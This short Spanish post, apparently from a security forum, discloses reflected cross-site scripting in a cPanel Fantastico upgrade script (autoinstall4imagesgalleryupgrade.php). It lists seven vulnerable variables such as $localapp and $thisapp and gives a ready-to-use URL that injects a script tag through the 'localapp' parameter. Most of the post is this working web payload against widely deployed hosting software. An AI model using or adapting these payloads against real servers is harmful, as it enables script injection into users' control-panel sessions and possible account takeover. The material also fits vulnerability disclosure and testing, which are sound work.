Hay más variables vulnerables, aquí tenéis una pequeña lista:
$localapp
$updatedir
$scriptpath_show
$domain_show
$thispage
$thisapp
$currentversion
Se usa así:
https://dominio.com:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrad e%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
donde "localapp" es el nombre de variable.